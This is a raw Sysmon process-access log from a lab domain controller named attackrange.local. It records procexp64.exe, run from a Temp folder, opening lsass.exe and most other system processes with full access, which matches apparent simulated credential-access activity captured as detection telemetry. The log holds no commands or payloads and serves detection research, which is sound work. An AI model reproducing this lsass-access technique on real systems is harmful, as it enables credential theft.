15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790945Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790944Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790943Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790942Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790941Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790940Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790939Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790938Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790937Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790936Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790935Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790934Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790933Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790932Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790931Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790930Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790929Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790928Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790927Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790926Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790925Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790924Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790923Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790922Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790921Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.282{732C744F-3262-6010-D8A2-00000000A301}81007504C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790920Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.110{732C744F-1593-600B-AC00-00000000A301}46563536C:\Windows\system32\conhost.exe{732C744F-3262-6010-D8A2-00000000A301}8100C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790919Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.110{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790918Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.110{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790917Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.110{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790916Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.110{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790915Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.110{732C744F-1517-600B-0500-00000000A301}640656C:\Windows\system32\csrss.exe{732C744F-3262-6010-D8A2-00000000A301}8100C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000790914Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.110{732C744F-1593-600B-A800-00000000A301}26163156C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{732C744F-3262-6010-D8A2-00000000A301}8100C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000790913Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.111{732C744F-3262-6010-D8A2-00000000A301}8100C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{732C744F-1518-600B-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000791178Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3263-6010-DAA2-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791177Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 